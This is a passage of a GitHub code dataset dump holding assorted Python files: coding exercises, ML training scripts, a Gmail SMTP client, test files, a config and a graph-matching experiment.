range(len(coords)):\n        cx, cy = coords[i]\n        rest = np.delete(coords, i, axis=0)\n        rest -= coords[i]\n        # print('considering:', cx, cy)\n        # print('rebased', rest)\n        rest = np.array(sorted(rest, key=lambda p: np.max(np.abs(p))))\n        # print('sorted', rest)\n        masked = np.zeros(len(rest), bool)\n        for j in range(len(rest)-1):\n            if masked[j]:\n                continue\n            # print('masking:', rest[j])\n            x, y = rest[j] // np.gcd(*rest[j])\n            # eg (4, 2) masks (2, 1), (4, 2), (6, 3)\n            # multiples\n            ds = rest[j+1:,0] * y == rest[j+1:,1] * x\n            # print(ds)\n            # same quarter\n            q = ((rest[j+1:] * rest[j]) >= 0).all(axis=1)\n            # print(q)\n            masked[j+1:] = masked[j+1:] | (ds & q)\n            # print('result:', masked)\n\n        # print('amsked:', masked)\n        sees = (~masked).sum()\n        counts[i] = sees\n\n    return coords, counts\n\ndef test1(data):\n    coords, counts = calc1(data)\n    return tuple(coords[np.argmax(counts)])\n\ndef quarter(q, ratio, vapourized, survivors):\n    # group by matching ratio, sorted by first in sweep\n    for _, group in itertools.groupby(sorted(q, key=ratio), key=ratio):\n        # sort by distance\n        order = sorted(group, key=lambda p: abs(p[0])+abs(p[1]))\n        vapourized.append(order[0])\n        survivors.extend(order[1:])\n\ndef part1(data):\n    coords, counts = calc1(data)\n    pos = coords[np.argmax(counts)]\n    return tuple(pos), max(counts)\n\ndef part2(data, base=None, number=199):\n    a = np.array([list(line) for line in data.split()])\n    if base:\n        a[base[1],base[0]] = 'X'\n    coords = 
np.argwhere(a.T == '#')\n base = np.argwhere(a.T == 'X')\n coords -= base\n vapourized = []\n\n while len(coords):\n q1 = coords[(coords[:,0] >= 0) & (coords[:,1] < 0)]\n q2 = coords[(coords[:,0] > 0) & (coords[:,1] >= 0)]\n q3 = coords[(coords[:,0] <= 0) & (coords[:,1] > 0)]\n q4 = coords[(coords[:,0] < 0) & (coords[:,1] <= 0)]\n\n survivors = []\n quarter(q1, lambda p: abs(p[0]/p[1]), vapourized, survivors)\n quarter(q2, lambda p: abs(p[1]/p[0]), vapourized, survivors)\n quarter(q3, lambda p: abs(p[0]/p[1]), vapourized, survivors)\n quarter(q4, lambda p: abs(p[1]/p[0]), vapourized, survivors)\n\n coords = np.array(survivors)\n\n vapourized = np.array(vapourized) + base\n x, y = vapourized[number]\n return x*100+y\n\nif __name__ == '__main__':\n data = open('input10.txt').read()\n pos, count = part1(data)\n print(count)\n print(part2(data, pos))\n","repo_name":"barnybug/aoc2019","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70887510887","text":"#1.8\n\n#Hipoteca_adelantos\n#Supongamos que David adelanta pagos extra de $1000/mes durante los primeros 12 meses de la hipoteca.Modificá el programa para incorporar estos pagos extra y que imprima el monto total pagado junto con la cantidad de meses requeridos.Cuando lo corras, este nuevo programa debería dar un pago total de 929965.62 en 342 meses.\n\npago_extra_mes_comienzo = 61\npago_extra_mes_fin = 108\npago_extra = 1000\n\nsaldo = 500000.0\ntasa = 0.05\npago_mensual = 2684.11\ntotal_pagado = 0.0\nmes = 1\n\nwhile saldo > 0:\n if (mes >= pago_extra_mes_comienzo and mes <= pago_extra_mes_fin):\n print(\"Entro al if\")\n saldo = saldo * (1+tasa/12) - pago_mensual - pago_extra\n total_pagado = total_pagado + pago_mensual + pago_extra\n else:\n saldo = saldo * (1+tasa/12) - pago_mensual\n total_pagado = total_pagado + pago_mensual\n \n if (saldo < 0):\n total_pagado = total_pagado + saldo\n saldo = 0\n\n print(mes, round(total_pagado, 2), round(saldo, 2))\n mes = mes + 1\n \nprint('Total pagado', round(total_pagado, 2))\nprint('Meses: ', mes-1)\n\n#Maria Elisa Araya\n","repo_name":"elishitas/python_UNSAM","sub_path":"hipoteca_adelantos.py","file_name":"hipoteca_adelantos.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2791952323","text":"#from sklearn.cross_validation import train_test_split\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split #py3\nfrom sklearn.feature_extraction import stop_words\nimport numpy as np\nfrom nltk.util import ngrams,everygrams\nimport re\nimport string\nimport time\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation\nfrom keras.layers.embeddings import Embedding #change\n\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\nstop=stop_words.ENGLISH_STOP_WORDS\nRUNS=3\nnum_ex=20000\n\ndef create_conv_model(inplen):\n model_conv = Sequential()\n model_conv.add(Embedding(len(word_set)+1, 100, input_length=inplen))\n model_conv.add(Dropout(0.2))\n model_conv.add(Conv1D(64, 5, activation='relu'))\n model_conv.add(MaxPooling1D(pool_size=4))\n model_conv.add(LSTM(100))\n model_conv.add(Dense(1, activation='sigmoid'))\n model_conv.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model_conv\n\ndef encode_sentences(txt):\n 
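# multi-hot encode each sentence over its unigrams and bigrams; the extra last column stores the sentence id carried in t[0]\n    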
feature_set=np.zeros((len(txt), len(word_set)+1),dtype=int)\n    tnum=0\n    for t in txt:\n        s_words=t[1:]+list(set(list(everygrams(t[1:], min_len=2,max_len=2))))\n        for w in s_words:\n            idx=word_idx[w]\n            feature_set[tnum][idx]=1\n        feature_set[tnum][-1]=t[0]\n        tnum+=1\n    return feature_set\n\ninp='../tweets_positivenegative.csv'\n\nsents=[]\nlabels=[]\nall_words=[]\n\ndf=pd.read_csv(inp,sep='\\t', quoting=2, dtype={'id ':int,'polarity': int })\ndf = df.dropna()\ndata=df.iloc[np.r_[0:num_ex, -num_ex:0]]\n\nfrom nltk.tokenize import TweetTokenizer\ntknzr = TweetTokenizer()\n\nmaxlen=53\nlcnt=0\n\nfor ind, row in data.iterrows():\n\ttw=row['tweet'].lower()\n\twords=tknzr.tokenize(tw)\n\tif len(words)<maxlen:\n\t\t# pad short tweets to maxlen; this body is reconstructed -- the original '<...>' spans were stripped during extraction\n\t\tfor j in range(maxlen-len(words)):\n\t\t\twords.append('<pad>')\n\tbl=list(set(list(everygrams(words, min_len=2,max_len=2))))\n\tall_words+=words+bl\n\twords.insert(0,lcnt)\n\tsents.append(words)\n\tif row['polarity']==4:\n\t\tlabels.append(1)\n\telse:\n\t\tlabels.append(0)\n\tlcnt+=1\n\nword_set=set(all_words)\ni=0\nword_idx = dict((c, i + 1) for i, c in enumerate(word_set,start = -1))\nreverse_word_map = dict(map(reversed, word_idx.items()))\ndata=encode_sentences(sents)\n\nCLASSES=list(set(labels))\nNUM_FEATURES=len(data[0])-1\n\nresult=np.zeros(RUNS)\nclf = create_conv_model(len(word_set)) #change\n\nfor r in range(RUNS):\n    print('Run:',r)\n    x_train, x_test, y_train, y_test = train_test_split(data, labels)\n    x_train_ids=x_train[:,-1]\n    x_test_ids=x_test[:,-1]\n    x_train=x_train[:,:-1]\n    x_test=x_test[:,:-1]\n    clf.fit(x_train, np.array(y_train), validation_split=0.1, epochs =1)\n    print(clf.predict(x_test))\n","repo_name":"rupsaijna/annotated_pytsetlin_machine","sub_path":"examples/sentiment140/baseline/cnnlstm.py","file_name":"cnnlstm.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"70564224809","text":"def min_and_max(num1, num2):\n\tif num1 > num2:\n\t\treturn num2, num1\n\telse:\n\t\treturn num1, num2\n\ndef converte_par(numero):\n\t'''Transforma um número par em um número sucessor impar'''\n\treturn numero + ((numero+1)%2)\n\t\n\ndef soma_impares(inicio, fim, soma=0):\n\t'''Obs: Possível problema de limite de recursões'''\n\tif fim%2 == 0:\n\t\tfim = converte_par(fim)\n\n\tif inicio%2 == 0:\n\t\tinicio = converte_par(inicio)\n\telse:\n\t\tinicio += 2\n\n\tif inicio < fim:\n\t\treturn soma_impares(inicio, fim, soma+inicio)\n\telse:\n\t\treturn soma\n\n\ndef main():\n\tnum1 = int(input())\n\tnum2 = int(input())\n\n\tnum1, num2 = min_and_max(num1, num2)\n\n\tprint(soma_impares(num1, num2))\n\n\nmain()\n","repo_name":"douradodev/Uri","sub_path":"Uri/1071_v2.py","file_name":"1071_v2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"31494362572","text":"import pandas as pd\nfrom collections import Counter\nimport requests\nimport json\nimport os\n\ndirname = os.path.dirname(__file__)\n\n\ndef add_database():\n    ratings_local = pd.read_csv(\n        os.path.join(\n            dirname,\n            '../../data/data-for-analysis/ratings-smaller-with-new-ids.csv'))\n\n    req_ratings = requests.get(\n        # 'http://localhost:8080/api/v1/rating/get-all').json()\n        'https://www.backend.themoviebakery.com/api/v1/rating/get-all').json()\n\n    json_list = json.dumps(req_ratings, indent=4)\n\n    ratings_db = pd.read_json(json_list)\n    if len(ratings_db) != 0:\n        ratings_db.drop(axis=1,\n                        labels=['created_at', 'updated_at', 'ratingId'],\n                        inplace=True)\n        ratings_db.rename(columns={'ratingValue': 
'rating'}, inplace=True)\n ratings_db['userId'] += 49\n\n ratings_df = pd.concat([ratings_local, ratings_db])\n ratings_df.to_csv(os.path.join(\n dirname,\n '../../data/data-for-analysis/ratings-small-with-database.csv'),\n index=False)\n else:\n ratings_local.to_csv(os.path.join(\n dirname,\n '../../data/data-for-analysis/ratings-small-with-database.csv'),\n index=False)\n\n del req_ratings\n del json_list\n del ratings_db\n\n\nadd_database()\n","repo_name":"diegolikescode/themoviebakery-recommender","sub_path":"src/data_preprocessing/c_add_database_to_ratings.py","file_name":"c_add_database_to_ratings.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72508934887","text":"import pytest\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom lebonplantapi.adapters.database.mappers import (\n map_from_product_creation,\n map_to_product_entity,\n)\n\nfrom tests.adapters.database.factories import ProductFactory, UserFactory\nfrom tests.domain.request_models.factories import ProductCreationFactory\n\n\npytestmark = [\n pytest.mark.asyncio,\n pytest.mark.usefixtures(\"db\"),\n]\n\n\nclass TestMapToProduct:\n def test__ok(self) -> None:\n product = ProductFactory.build()\n entity = map_to_product_entity(product)\n\n assert entity is not None\n assert entity.id == product.id\n assert entity.name == product.name\n\n\nclass TestMapFromProductCreation:\n async def test__ok(self, session_autoclose: AsyncSession) -> None:\n product_creation = ProductCreationFactory()\n\n product = map_from_product_creation(product_creation)\n\n user = UserFactory.build(id=product.vendor_id)\n session_autoclose.add(user)\n\n session_autoclose.add(product)\n await session_autoclose.flush()\n await session_autoclose.refresh(product)\n\n assert product is not None\n assert product.name == product_creation.name\n","repo_name":"LiquidNalee/LeBonPlantAPI","sub_path":"tests/adapters/database/mappers/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12385880364","text":"#!/usr/bin/env python\n# coding=utf-8\n\n''' `mail' like gmail smtp client, run it with '-h' for usage '''\n\nimport os\nimport sys\nimport smtplib\nimport optparse\nimport unittest\nimport mimetypes\nfrom email import encoders\nfrom email.message import Message\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom cStringIO import StringIO\n\n\ndef parse_option(args=None):\n parser = optparse.OptionParser()\n parser.add_option('-s', '--subject', dest='subject',\n help='subject of the mail')\n parser.add_option('-u', '--username', dest='username',\n help='send mail through gmail as')\n parser.add_option('-p', '--password', dest='password',\n help='password to login info gmail account')\n parser.add_option('-x', '--xhtml_body', dest='xhtml_body',\n help='the html body of the message')\n parser.add_option('-a', '--attach', dest='attaches', action='append',\n help='attachment to send')\n parser.add_option('-b', '--bcc', dest='bcc', action='append',\n help='send blind carbon copies to list of users')\n parser.add_option('-c', '--cc', dest='cc', action='append',\n help='send carbon copies to list of users')\n (options, arguments) = parser.parse_args(args)\n 
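# leftover positional arguments are the recipient addresses (passed as to_addresses by main)\n    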
return options, arguments\n\n\ndef gmail_sendmail(from_address, password,\n to_addresses, cc_addresses, bcc_addresses,\n subject, text_body='', xhtml_body=None, attachments=None):\n gmail_account = from_address\n if attachments == None:\n attachments = []\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(gmail_account, password)\n outer = MIMEMultipart('mixed')\n outer['Subject'] = subject\n outer['To'] = ', '.join(to_addresses)\n if cc_addresses is not None:\n outer['Cc'] = ', '.join(cc_addresses)\n else:\n cc_addresses = []\n if bcc_addresses is None:\n bcc_addresses = []\n outer['From'] = from_address\n\n for att in attachments:\n if sys.platform == 'win32':\n if att[1] != ':':\n # relative path\n path = os.path.join(os.getcwd(), att)\n else:\n path = att\n elif sys.platform.startswith('linux') or \\\n sys.platform in ('darwin', 'cygwin'):\n if att[0] != '/':\n # relative path\n path = os.path.join(os.getcwd(), att)\n else:\n path = att\n else:\n raise ValueError('what os is it?!')\n # Guess the content type based on the file's extension. Encoding\n # will be ignored, although we should check for simple things like\n # gzip'd or compressed files.\n ctype, encoding = mimetypes.guess_type(path)\n if ctype is None or encoding is not None:\n # No guess could be made, or the file is encoded (compressed), so\n # use a generic bag-of-bits type.\n ctype = 'application/octet-stream'\n maintype, subtype = ctype.split('/', 1)\n if maintype == 'text':\n fp = open(path, 'rb')\n # Note: we should handle calculating the charset\n msg = MIMEText(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'image':\n fp = open(path, 'rb')\n msg = MIMEImage(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'audio':\n fp = open(path, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=subtype)\n fp.close()\n else:\n fp = open(path, 'rb')\n msg = MIMEBase(maintype, subtype)\n msg.set_payload(fp.read())\n fp.close()\n # Encode the payload using Base64\n encoders.encode_base64(msg)\n # Set the filename parameter\n msg.add_header('Content-Disposition', 'attachment',\n filename=os.path.basename(path))\n outer.attach(msg)\n\n if xhtml_body is not None:\n html_content = MIMEText(xhtml_body, 'html')\n outer.attach(html_content)\n else:\n text_content = MIMEText(text_body, 'plain')\n outer.attach(text_content)\n\n server.sendmail(gmail_account,\n to_addresses + cc_addresses + bcc_addresses,\n outer.as_string())\n server.close()\n\n\ndef main():\n options, arguments = parse_option()\n text_body = StringIO()\n if options.xhtml_body:\n xhtml_body = StringIO()\n with open(options.xhtml_body) as f:\n xhtml_body.write(f.read())\n else:\n xhtml_body = None\n for line in sys.stdin:\n text_body.write(line)\n gmail_sendmail(from_address=options.username,\n password=options.password,\n to_addresses=arguments,\n cc_addresses=options.cc,\n bcc_addresses=options.bcc,\n subject=options.subject,\n text_body=text_body.getvalue(),\n xhtml_body=(xhtml_body.getvalue() if xhtml_body else None),\n attachments=options.attaches)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"menghan/menghanrc","sub_path":"bin/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"11432509387","text":"# -*- coding=utf-8 -*-\n# @File : temp.py\n# @Time : 2023/8/29 10:27\n# @Author : EvanHong\n# @Email : 939778128@qq.com\n# @Project : 
2023.06.08超高频上证50指数计算\n# @Description: 将旧的status转为value为list的status\n\nimport os\nimport sys\npath = os.path.join(os.path.dirname(__file__), os.pardir)\nsys.path.append(path)\n\nfrom collections import defaultdict\nimport config\nfrom backtester import LobBackTester\nfrom brokers.broker import Broker\nfrom config import *\nfrom datafeeds.datafeed import LobDataFeed\nfrom observers.observer import LobObserver\nfrom preprocessors.preprocess import AggDataPreprocessor\nfrom strategies import LobStrategy\nfrom support import *\n\nif __name__ == '__main__':\n load_status(is_tick=True)\n\n # orderbooks\n stk_name_list = config.complete_status['orderbooks']\n temp = {}\n for k in stk_name_list:\n if k in ['AAPL', 'AMZN', 'GOOG', 'INTC', 'MSFT']:\n temp[k] = [\"2012-06-21\"]\n else:\n temp[k] = [\"2022-06-23\", \"2022-06-28\", \"2022-06-29\"]\n config.complete_status['orderbooks']=temp\n\n # features\n temp1 = defaultdict(list)\n for r, d, f in os.walk(r'D:\\Work\\INTERNSHIP\\海通场内\\2023.06.08超高频上证50指数计算\\data\\tick_data/'):\n for ff in f:\n if 'clean' not in ff: continue\n (date, stk_name, suffix, _) = ff.split('_')\n date = str(pd.to_datetime(date).date())\n temp1[stk_name].append(date)\n temp1\n\n temp.update(temp1)\n\n stk_name_list = config.complete_status['features']\n temp = {}\n for k in stk_name_list:\n if k in ['AAPL', 'AMZN', 'GOOG', 'INTC', 'MSFT']:\n temp[k] = [\"2012-06-21\"]\n else:\n temp[k] = [\"2022-06-23\", \"2022-06-28\", \"2022-06-29\"]\n temp\n counter = defaultdict(lambda: defaultdict(int))\n for r, d, f in os.walk(r'D:\\Work\\INTERNSHIP\\海通场内\\2023.06.08超高频上证50指数计算\\data\\tick_data/'):\n for ff in f:\n if 'feature' not in ff: continue\n (date, stk_name, suffix) = ff.split('_')\n date = str(pd.to_datetime(date).date())\n counter[stk_name][date] += 1\n\n temp1 = defaultdict(list)\n for stk_name in counter.keys():\n for d, v in counter[stk_name].items():\n if v == 4: temp1[stk_name].append(d)\n\n temp.update(temp1)\n config.complete_status['features']=temp\n save_status(is_tick=True)","repo_name":"EvanHong99/backtest","sub_path":"scripts/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19293396816","text":"#Dada uma tupla e um elemento, elimine esse elemento da tupla.\n\ndef elimina(tuplas_indices):\n lista = list(tuplas_indices)\n removivel = int(input(\"Digite um número de 0-10, que se queira remover da Tupla:\"))\n if removivel>10 or removivel<0:\n print(\"Número inválido.\")\n quit()\n lista.remove(removivel)\n nova_tupla = tuple(lista)\n print(nova_tupla)\n\n#Programa Principal\n\ntuplas_indices = (0,1,2,3,4,5,6,7,8,9,10)\n\nelimina(tuplas_indices)","repo_name":"LC-ardovino/INFNET","sub_path":"Fundamentos do Desenvolvimento Python/TPs/TP1/Questão 5-3.py","file_name":"Questão 5-3.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28146455864","text":"embed_multi = dict(lr_mult=1.0, decay_mult=0.0)\n# optimizer\noptimizer = dict(\n type='AdamW',\n lr=0.0001,\n weight_decay=0.05,\n eps=1e-8,\n betas=(0.9, 0.999),\n paramwise_cfg=dict(\n custom_keys={\n 'backbone': dict(lr_mult=0.1, decay_mult=1.0),\n 'query_embed': embed_multi,\n 'query_feat': embed_multi,\n 'level_embed': embed_multi,\n },\n norm_decay_mult=0.0)\n)\noptimizer_config = dict(grad_clip=dict(max_norm=0.01, norm_type=2))\n\nlr_config = dict(\n policy='step',\n gamma=0.1,\n 
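# step policy: lr is multiplied by gamma at each milestone iteration in 'step'\n    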
by_epoch=False,\n step=[5000, 10000],\n warmup='linear',\n warmup_by_epoch=False,\n warmup_iters=500,\n warmup_ratio=0.001,\n)\n\nmax_iters = 15000\nrunner = dict(type='IterBasedRunner', max_iters=max_iters)\n","repo_name":"lxtGH/Tube-Link","sub_path":"configs/video/_base_/schedules/mask2former_schedules_iter.py","file_name":"mask2former_schedules_iter.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"53"} +{"seq_id":"3300951498","text":"# %% [markdown]\n# ##\nimport os\nimport time\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport seaborn as sns\nfrom sklearn.metrics import pairwise_distances\n\nfrom graspy.embed import ClassicalMDS\nfrom graspy.match import GraphMatch\nfrom graspy.plot import heatmap\nfrom graspy.simulations import sbm, sbm_corr\nfrom src.data import load_metagraph\nfrom src.graph import preprocess\nfrom src.io import savecsv, savefig\nfrom src.utils import invert_permutation\nfrom src.visualization import CLASS_COLOR_DICT, adjplot\n\nprint(scipy.__version__)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n \"axes.edgecolor\": \"lightgrey\",\n \"ytick.color\": \"grey\",\n \"xtick.color\": \"grey\",\n \"axes.labelcolor\": \"dimgrey\",\n \"text.color\": \"dimgrey\",\n}\nfor key, val in rc_dict.items():\n mpl.rcParams[key] = val\ncontext = sns.plotting_context(context=\"talk\", font_scale=1, rc=rc_dict)\nsns.set_context(context)\n\nnp.random.seed(8888)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name, foldername=FNAME, **kws)\n\n\ndef random_permutation(n):\n perm_inds = np.random.choice(int(n), replace=False, size=int(n))\n P = np.zeros((n, n))\n P[np.arange(len(P)), perm_inds] = 1\n return P\n\n\n# %% [markdown]\n# ##\n\nshow_adjs = False\nB = np.array([[0.3, 0.7], [0.05, 0.3]])\nrho = 0.9\nn_per_block = 10\nn_blocks = len(B)\ncomm = n_blocks * [n_per_block]\n\nn_init = 50\neps = 1.0\nn_samples = 20\n\nrows = []\nfor i in range(n_samples):\n A1, A2 = sbm_corr(comm, B, rho)\n max_score = np.trace(A1 @ A2.T)\n\n shuffle_inds = np.random.choice(len(A1), replace=False, size=len(A1))\n A2_shuffle = A2[np.ix_(shuffle_inds, shuffle_inds)]\n\n if show_adjs:\n fig, axs = plt.subplots(1, 4, figsize=(10, 5))\n heatmap(A1, ax=axs[0], cbar=False, title=\"Graph 1\")\n heatmap(A2, ax=axs[1], cbar=False, title=\"Graph 2\")\n heatmap(A1 - A2, ax=axs[2], cbar=False, title=\"Diff (G1 - G2)\")\n heatmap(A2_shuffle, ax=axs[3], cbar=False, title=\"Graph 2 shuffled\")\n\n P = np.zeros_like(A1)\n P[np.arange(len(P)), shuffle_inds] = 1\n fig, axs = plt.subplots(1, 4, figsize=(20, 5))\n heatmap(A2, ax=axs[0], cbar=False, title=\"Graph 2\")\n heatmap(P @ A2 @ P.T, ax=axs[1], cbar=False, title=\"P shuffled\")\n heatmap(A2_shuffle, ax=axs[2], cbar=False, title=\"Index shuffled\")\n heatmap(P.T @ A2_shuffle @ P, ax=axs[3], cbar=False, title=\"P unshuffled\")\n\n for init_weight in [0, 0.25, 0.5, 0.75, 0.9, 0.95, \"random\"]:\n\n import matplotlib.transforms as transforms\n\n n_verts = A1.shape[0]\n\n all_positions = []\n init_indicator = []\n\n gm = GraphMatch(\n n_init=n_init,\n init=\"barycenter\",\n init_weight=init_weight,\n max_iter=20,\n shuffle_input=False,\n 
eps=eps,\n        )\n        gm.fit(A1, A2_shuffle)\n        results = gm.results_\n        progress = gm.progress_\n        final_scores = progress.groupby(\"init_idx\")[\"pseudoscore\"].max()\n        progress[\"final_score\"] = progress[\"init_idx\"].map(final_scores)\n        progress[\"optimal\"] = np.abs((progress[\"final_score\"] - max_score)) < 0.1\n        p_found = progress[\"optimal\"].mean()\n        row = {\"p_found\": p_found, \"init_weight\": init_weight}\n        rows.append(row)\n\ninit_weight_results = pd.DataFrame(rows)\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.stripplot(data=init_weight_results, x=\"init_weight\", y=\"p_found\", ax=ax)\nmean_results = init_weight_results.groupby(\"init_weight\").mean().reset_index()\nsns.stripplot(\n    data=mean_results,\n    x=\"init_weight\",\n    y=\"p_found\",\n    ax=ax,\n    size=30,\n    marker=\"_\",\n    linewidth=1,\n)\n\n# %% [markdown]\n# ##\n\nfig, axs = plt.subplots(2, 1, figsize=(8, 8), sharex=True)\n\nax = axs[0]\ntrans = transforms.blended_transform_factory(ax.transAxes, ax.transData)\nsns.lineplot(\n    data=progress,\n    x=\"iter\",\n    y=\"grad\",\n    hue=\"init_idx\",\n    palette=\"tab20\",\n    legend=False,\n    alpha=0.5,\n    linewidth=1,\n    ax=ax,\n)\nsns.lineplot(\n    data=progress[progress[\"optimal\"]],\n    x=\"iter\",\n    y=\"grad\",\n    hue=\"init_idx\",\n    palette=\"tab20\",\n    legend=False,\n    alpha=1,\n    ax=ax,\n)\nax.axhline(eps, linestyle=\":\", color=\"darkred\")\nax.text(1.01, eps, \"Epsilon\", transform=trans, va=\"center\", color=\"darkred\")\nax.set_ylabel(\"Gradient\")\n\nax = axs[1]\ntrans = transforms.blended_transform_factory(ax.transAxes, ax.transData)\nsns.lineplot(\n    data=progress,\n    x=\"iter\",\n    y=\"pseudoscore\",\n    hue=\"init_idx\",\n    palette=\"tab20\",\n    legend=False,\n    alpha=0.5,\n    ax=ax,\n    linewidth=1,\n)\nsns.lineplot(\n    data=progress[progress[\"optimal\"]],\n    x=\"iter\",\n    y=\"pseudoscore\",\n    hue=\"init_idx\",\n    palette=\"tab20\",\n    legend=False,\n    alpha=1,\n    ax=ax,\n)\nax.axhline(max_score, linestyle=\":\", color=\"black\")\n\nax.text(\n    1.01,\n    max_score,\n    f\"Optimal\\n{p_found:0.2f} found\",\n    transform=trans,\n    va=\"center\",\n    color=\"black\",\n)\nax.set_ylabel(\"Score\")\nax.set_xlabel(\"Iteration\")\nstashfig(\"score-by-iter\")\n\n\n# %% [markdown]\n# ##\n\nfrom src.flow import make_exp_match, fit_gm_exp, diag_indices\n\n\ndef get_feedforward_B(low_p, diag_p, feedforward_p, n_blocks=5):\n    B = np.zeros((n_blocks, n_blocks))\n    B += low_p\n    B -= np.diag(np.diag(B))\n    B -= np.diag(np.diag(B, k=1), k=1)\n    B += np.diag(diag_p * np.ones(n_blocks))\n    B += np.diag(feedforward_p * np.ones(n_blocks - 1), k=1)\n    return B\n\n\nlow_p = 0.01\ndiag_p = 0.1\nfeedforward_p = 0.3\nn_blocks = 10\nn_per_block = 25  # 50\ncommunity_sizes = n_blocks * [n_per_block]\n\nbasename = f\"-n_blocks={n_blocks}-n_per_block={n_per_block}\"\n\nblock_probs = get_feedforward_B(low_p, diag_p, feedforward_p, n_blocks=n_blocks)\nfig, axs = plt.subplots(1, 2, figsize=(20, 10))\nsns.heatmap(block_probs, annot=True, cmap=\"Reds\", cbar=False, ax=axs[0], square=True)\naxs[0].xaxis.tick_top()\naxs[0].set_title(\"Block probability matrix\", pad=25)\n\nnp.random.seed(88)\nadj, labels = sbm(\n    community_sizes, block_probs, directed=True, loops=False, return_labels=True\n)\nn_verts = adj.shape[0]\n\nadjplot(adj, sort_class=labels, cbar=False, ax=axs[1], square=True)\naxs[1].set_title(\"Adjacency matrix\", pad=25)\nplt.tight_layout()\nstashfig(\"sbm\" + basename)\n\n# %% [markdown]\n# ##\n\ncurrtime = time.time()\n\nn_verts = len(adj)\n\nhalfs = [0.05, 0.1, 0.5, 1, 5, 10, 50, 100]\n\nalphas = [np.round(np.log(2) / (h * n_verts), 
decimals=7) for h in halfs]\n\nfrom sklearn.model_selection import ParameterGrid\n\nparam_grid = {\n    \"alpha\": alphas[:4],\n    \"beta\": [1, 0.5, 0.3],  # 0.9, 0.7, 0.5, 0.3, 0.1],\n    \"norm\": [False],\n    \"c\": [0],\n}\nparams = list(ParameterGrid(param_grid))\n\n\ndef calc_accuracy(block_preds):\n    acc = (block_preds == labels).astype(float).mean()\n    return acc\n\n\ndef calc_abs_dist(block_preds):\n    mae = np.abs(block_preds - labels).mean()\n    return mae\n\n\ndef calc_euc_dist(block_preds):\n    sse = np.sqrt(((block_preds - labels) ** 2).sum())\n    mse = sse / len(block_preds)\n    return mse\n\n\ndef calc_scores(perm):\n    block_preds = perm // n_per_block\n    acc = calc_accuracy(block_preds)\n    mae = calc_abs_dist(block_preds)\n    mse = calc_euc_dist(block_preds)\n    return acc, mae, mse\n    # ax.text(\n    #     0.75,\n    #     0.07,\n    #     f\"Acc. {acc:.2f}\\nMAE {mae:.2f}\\nMSE {mse:.2f}\",\n    #     transform=ax.transAxes,\n    # )\n\n\nn_init = 25\n\nrows = []\nfor p in params:\n    gm = GraphMatch(\n        n_init=n_init, init=\"barycenter\", init_weight=0.9, max_iter=20, eps=1\n    )\n    match = make_exp_match(adj, **p)\n    gm.fit(adj, match)\n    perm = gm.perm_inds_\n    acc, mae, mse = calc_scores(perm)\n    row = p.copy()\n    row[\"acc\"] = acc\n    row[\"mae\"] = mae\n    row[\"mse\"] = mse\n    row[\"score\"] = gm.score_\n    row[\"match_sum\"] = np.sum(match)\n    row[\"match_fro\"] = np.linalg.norm(match)\n    rows.append(row)\n\n# %% [markdown]\n# ##\nres_df = pd.DataFrame(rows)\nres_df[\"norm_score\"] = res_df[\"score\"] / res_df[\"match_sum\"]  # denominator was truncated in the source; total match weight assumed here\n\nheatmap_kws = dict(annot=True, annot_kws={\"size\": 8}, cmap=\"Reds\")\nfig, axs = plt.subplots(1, 2, figsize=(16, 8), sharey=True)\nax = axs[0]\nscore_df = res_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=score_df, ax=ax, **heatmap_kws)\n\nax = axs[1]\nacc_df = res_df.pivot(index=\"alpha\", columns=\"beta\", values=\"acc\")\nsns.heatmap(data=acc_df, ax=ax, 